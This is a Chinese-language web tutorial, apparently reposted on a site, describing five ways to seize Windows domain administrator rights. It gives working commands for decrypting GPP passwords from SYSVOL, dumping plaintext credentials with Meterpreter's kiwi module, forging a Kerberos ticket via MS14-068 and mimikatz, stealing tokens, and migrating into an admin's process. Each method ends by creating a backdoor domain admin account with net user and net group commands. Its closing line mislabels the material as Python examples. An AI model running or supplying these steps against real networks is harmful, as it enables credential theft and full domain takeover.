在大多數(shù)情況下，攻擊者可以通過定位域管理員所登錄的服務(wù)器，利用漏洞獲取服務(wù)器system權(quán)限，找到域管理的賬號(hào)、進(jìn)程或是身份驗(yàn)證令牌，從而獲取域管理員權(quán)限

第1種方式：利用GPP漏洞獲取域管理權(quán)限

SYSVOL是域內(nèi)的共享文件夾，用來存放登錄腳本、組策略腳本等信息。當(dāng)域管理員通過組策略修改密碼時(shí)，在腳本中引入用戶密碼，就可能導(dǎo)致安全問題。

（1）訪問SYSVOL共享文件夾，搜索包含“cpassword”的XML文件，獲取AES加密的密碼。

（2）使用kali自帶的gpp-decrypt進(jìn)行破解，從而獲取域賬號(hào)密碼，直接登錄域管理員賬號(hào)獲取訪問權(quán)限。

第2種方式：獲取服務(wù)器明文登錄密碼

使用kiwi模塊需要system權(quán)限，所以我們?cè)谑褂迷撃K之前需要將當(dāng)前MSF中的shell提升為system。提到system有兩個(gè)方法，一是當(dāng)前的權(quán)限是administrator用戶，二是利用其它手段先提權(quán)到administrator用戶。然后administrator用戶可以直接getsystem到system權(quán)限。

meterpreter > getuid
Server username: BYPASS-E97BA3FC\Administrator
meterpreter > getsystem 
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

加載kiwi模塊

load kiwi

列舉系統(tǒng)中的明文密碼

creds_all

第3種方式：使用MS14-068漏洞進(jìn)行提權(quán)

MS14068是一個(gè)能夠使普通用戶提權(quán)到域控權(quán)限的權(quán)限提升漏洞。攻擊者可以通過構(gòu)造特定的請(qǐng)求包來達(dá)到提升權(quán)限的目的。

攻擊流程：

第一步：利用MS14-068偽造生成TGT

MS14-068.exe -u bypass@test.com -p abc123! -s S-1-5-21-735015318-3972860336-672499796 -d  dc.test.com

第二步：利用mimikatz將工具得到的TGT票據(jù)寫入內(nèi)存，創(chuàng)建緩存證書

mimikatz#kerberos::ptc TGT_bypass@test.com.ccache

第三步：獲取域管理員權(quán)限。創(chuàng)建一個(gè) test 賬號(hào)并加入域管理員組，從而隨時(shí)可以登錄域控主機(jī)進(jìn)行操作。

PsExec.exe \\dc cmd.exe 
// 添加test用戶
net user test abc123! /add /domain
// 把 test 用戶添加進(jìn)域管理員組
net group "domain admins"  test /add /domain
// 查看域管理員
net group "domain admins" /domain

第4種方式：竊取域管理員令牌

當(dāng)有域控賬戶登陸至服務(wù)器時(shí)可使用令牌模擬進(jìn)行滲透取得域控權(quán)限。

1、入侵域管理員所在的服務(wù)器，竊取域管理員的令牌，從而控制整個(gè)域。

2、直接在meterpreter shell上執(zhí)行添加域管理員

add_user test abc123! -h 域控的IP地址
add_group_user "Domain Admins" test -h 域控IP地址

第5種方式：進(jìn)程遷移

入侵了域管理員所登錄的服務(wù)器，將進(jìn)程遷移到域管理員所運(yùn)行的進(jìn)程，就可以獲得域管理員權(quán)限。

1、獲取域管理員列表

net group "Domain Admins" /domain

2、利用ps找到域管理員（TEST\bypass）所運(yùn)行的進(jìn)程，然后將shell進(jìn)程遷移到域管理員所運(yùn)行的進(jìn)程中，成功后就獲得了域管理員權(quán)限。如下圖所示：

3、輸入shell命令獲取OS shell，在本機(jī)上使用Windows命令添加新的域管理員：

// 添加test用戶
net user test admin@123 /add /domain
// 把 test 用戶添加進(jìn)域管理員組
net group "domain admins"  test /add /domain

4、成功添加了域管理員賬號(hào)test。

以上就是Python安全獲取域管理員權(quán)限幾種方式操作示例的詳細(xì)內(nèi)容，更多關(guān)于Python獲取域管理員權(quán)限方式的資料請(qǐng)關(guān)注本站其它相關(guān)文章！

版權(quán)聲明：本站文章來源標(biāo)注為YINGSOO的內(nèi)容版權(quán)均為本站所有，歡迎引用、轉(zhuǎn)載，請(qǐng)保持原文完整并注明來源及原文鏈接。禁止復(fù)制或仿造本網(wǎng)站，禁止在非www.sddonglingsh.com所屬的服務(wù)器上建立鏡像，否則將依法追究法律責(zé)任。本站部分內(nèi)容來源于網(wǎng)友推薦、互聯(lián)網(wǎng)收集整理而來，僅供學(xué)習(xí)參考，不代表本站立場(chǎng)，如有內(nèi)容涉嫌侵權(quán)，請(qǐng)聯(lián)系alex-e#qq.com處理。